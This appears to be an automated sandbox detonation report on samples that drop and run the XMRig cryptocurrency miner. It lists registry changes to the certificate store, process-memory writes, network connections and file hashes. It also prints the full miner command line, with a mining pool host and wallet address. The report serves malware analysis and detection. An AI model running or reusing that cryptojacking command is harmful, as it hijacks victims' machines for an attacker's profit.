| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4908 wrote to memory of 2244 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4908 wrote to memory of 2244 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2244-16-0x000001522A8D0000-0x000001522A8F0000-memory.dmp
memory/2244-17-0x000001522A920000-0x000001522A940000-memory.dmp
memory/2244-18-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-20-0x000001522C220000-0x000001522C240000-memory.dmp
memory/2244-19-0x000001522C200000-0x000001522C220000-memory.dmp
memory/2244-21-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-22-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-25-0x000001522C220000-0x000001522C240000-memory.dmp
memory/2244-24-0x000001522C200000-0x000001522C220000-memory.dmp
memory/2244-23-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-26-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-27-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-28-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-29-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-30-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-31-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-32-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-33-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-34-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-35-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-36-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-37-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-38-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-39-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-40-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-41-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-42-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-43-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-44-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-45-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-46-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-47-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-48-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-49-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-50-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-51-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-52-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-53-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-54-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-55-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-56-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-57-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-58-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-59-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-60-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-61-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-62-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-63-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-64-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-65-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-66-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-67-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-68-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-69-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-70-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-71-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-72-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-73-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-74-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-75-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-76-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-77-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-78-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-79-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-80-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-81-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-82-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-83-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
memory/2244-84-0x00007FF693DF0000-0x00007FF6948F3000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:14
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4836 wrote to memory of 1924 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4836 wrote to memory of 1924 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4000,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=4228 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4756,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=1008 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.185:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.61.62.23.in-addr.arpa | udp |
